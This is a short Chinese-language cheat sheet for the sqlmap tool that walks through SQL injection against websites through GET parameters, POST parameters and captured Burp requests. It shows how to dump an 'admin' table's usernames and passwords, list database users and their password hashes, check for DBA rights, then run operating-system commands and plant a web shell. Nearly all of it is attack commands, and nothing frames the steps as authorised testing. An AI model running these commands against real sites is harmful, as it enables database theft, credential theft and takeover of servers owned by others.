sqlmap详解

GET注入

sqlmap.py -u "url" 检测存在不存在注入

sqlmap.py -u "url" --tables    列出数据库的表

sqlmap.py -u "url" --columns -T admin    列出admin的内容

sqlmap.py -u "url" --dump -T admin "useradmin,password"    列出useradmin password的内容

POST注入

sqlmap.py -u "www.xxx.com/index.php" --data "user=1&pass=1" --dbs 指定post参数注入出数据库

sqlmap.py -u "www.xxx.com/index.php" --forms    sqlmap自动查找网页上的表单，并注入

sqlmap.py -r 1.txt -p user 用burp抓包，保存为1.txt 然后用-r参数注入，用-p参数来指定网页上的参数

查看权限写shell

sqlmap.py -u "url" --user 列出数据库的所以用户

sqlmap.py -u "url" --passwords 列出数据库用户的密码

sqlmap.py -u "url" --current-db 查看当前使用网站数据库的名字

sqlmap.py -u "url" --current-user 查看当前网站数据库的用户名称

sqlmap.py -u "url" --is-dba 查看当前用户是否是管理员权限   True代表有，如果没有的话就是False

如果，你验证了，是dba权限,那么就可以执行下面的命令了。

在数据库为mysql、postgresql、sql server时可以用    sqlmap.py -u "url" --os-cmd 来模拟一个cmd命令，然后执行一些命令，比如    sqlmap.py -u "url" --os-cmd=ipconfig 来获得ip。

sqlmap.py -u "url" --os-shell 写入一个shell，这里默认是php，如果是别的要自己选择。

其他参数

#sqlmap --techenique 参数

B：布尔型注入

E：报错型注入

U：可联合查询注入

S：可多语句查询注入

T：基于时间延迟注入

--dbms=”mysql”指定 mysql 数据库

--level=x  x是要指定的数